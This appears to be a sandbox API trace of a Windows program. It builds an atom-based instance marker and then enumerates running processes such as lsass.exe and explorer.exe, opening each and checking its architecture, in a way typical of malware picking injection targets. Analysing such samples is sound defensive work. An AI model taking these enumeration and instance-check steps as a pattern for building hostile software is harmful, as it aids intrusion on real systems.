	[0127.562] GetLastError () returned 0x5
	[0127.562] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.562] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.563] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetLastError () returned 0x5
	[0127.564] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.564] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.565] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.565] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.565] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.565] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.565] CloseHandle (hObject=0x2dc) returned 1
	[0127.565] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0127.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.566] CloseHandle (hObject=0x2dc) returned 1
	[0127.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.566] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0127.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.566] CloseHandle (hObject=0x2dc) returned 1
	[0127.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0127.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.567] CloseHandle (hObject=0x2dc) returned 1
	[0127.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.567] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0127.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.569] CloseHandle (hObject=0x2dc) returned 1
	[0127.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0127.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.569] CloseHandle (hObject=0x2dc) returned 1
	[0127.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0127.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0127.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0127.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0127.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0127.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0127.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0127.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0127.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0127.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0127.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0127.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0127.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0127.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0127.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0127.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0127.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0127.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0127.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0127.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.609] CloseHandle (hObject=0x2dc) returned 1
	[0127.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0127.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0127.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0127.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.610] CloseHandle (hObject=0x2dc) returned 1
	[0127.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0127.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.611] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0127.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.611] CloseHandle (hObject=0x2dc) returned 1
	[0127.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0127.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.612] CloseHandle (hObject=0x2dc) returned 1
	[0127.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.612] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0127.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.612] CloseHandle (hObject=0x2dc) returned 1
	[0127.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0127.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.613] CloseHandle (hObject=0x2dc) returned 1
	[0127.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0127.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.613] CloseHandle (hObject=0x2dc) returned 1
	[0127.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0127.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.613] CloseHandle (hObject=0x2dc) returned 1
	[0127.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0127.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0127.614] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.614] CloseHandle (hObject=0x2dc) returned 1
	[0127.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0127.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.615] CloseHandle (hObject=0x2dc) returned 1
	[0127.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0127.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.615] CloseHandle (hObject=0x2dc) returned 1
	[0127.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.615] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0127.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.616] CloseHandle (hObject=0x2dc) returned 1
	[0127.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0127.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.616] CloseHandle (hObject=0x2dc) returned 1
	[0127.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.616] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0127.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.616] CloseHandle (hObject=0x2dc) returned 1
	[0127.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0127.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.617] CloseHandle (hObject=0x2dc) returned 1
	[0127.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.617] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0127.617] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.617] CloseHandle (hObject=0x2dc) returned 1
	[0127.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0127.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.618] CloseHandle (hObject=0x2dc) returned 1
	[0127.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0127.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.618] CloseHandle (hObject=0x2dc) returned 1
	[0127.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0127.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.619] CloseHandle (hObject=0x2dc) returned 1
	[0127.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0127.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.619] CloseHandle (hObject=0x2dc) returned 1
	[0127.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
